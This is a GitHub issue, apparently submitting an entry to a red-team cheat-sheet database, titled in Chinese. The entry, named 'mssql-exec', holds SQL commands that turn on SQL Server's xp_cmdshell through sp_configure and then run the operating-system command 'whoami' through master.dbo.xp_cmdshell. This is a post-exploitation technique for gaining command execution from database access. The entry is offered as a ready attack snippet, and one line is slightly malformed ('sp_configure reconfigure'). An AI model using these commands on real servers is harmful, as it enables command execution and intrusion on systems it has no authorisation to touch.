### ISSUE TITLE
提交文档-[mssql-exec]

### ISSUE THREAD

**Issue by Rvn0xsy** [Rvn0xsy/red-tldr-db#12]
### 文档内容

```yaml
name:  mssql-exec
tags: [mssql,xpcmdshell,exec]
data: |
  plateform/windows #target/local
  
  SQL Server xpcmdshell

  ```
    EXEC sp_configure 'show advanced option', 1
    EXEC sp_configure reconfigure
    EXEC sp_configure 'xp_cmdshell', 1
    EXEC sp_configure reconfigure
    EXEC master.dbo.xp_cmdshell 'whoami'
  ```
 
```
